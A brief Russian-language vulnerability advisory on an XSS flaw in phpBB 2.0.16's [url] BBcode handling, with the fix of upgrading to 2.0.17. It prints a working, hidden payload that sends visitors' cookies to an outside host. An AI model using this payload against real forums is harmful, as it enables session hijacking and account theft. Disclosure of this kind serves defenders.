Описание
Суть уязвимости
Похоже, обнаружение уязвимостей в популярном форумном ПО phpBB становится «хорошей» традицией. Очередная уязвимость обнаружена в недавно выпущенной версии 2.0.16. Первая связана с некорректной обработкой BB-кода «url», что может позволить выполнить код в браузере — необходимо отметить, что работает только в Internet Explorer.
BBcode [url] парсится следующим образом: скрит рассматривает 4 возможных случая применения этого бб-кода:
[url]xxxx://www.phpbb.com[/url] code
[url]www.phpbb.com[/url] code.. (no xxxx:// prefix)
[url=xxxx://www.phpbb.com]phpBB[/url] code
[url=www.phpbb.com]phpBB[/url] code.. (no xxxx:// prefix)
Эксплоит
[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://comp-info.ru/pic/image.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
Решение: Установить phpbb 2.0.17
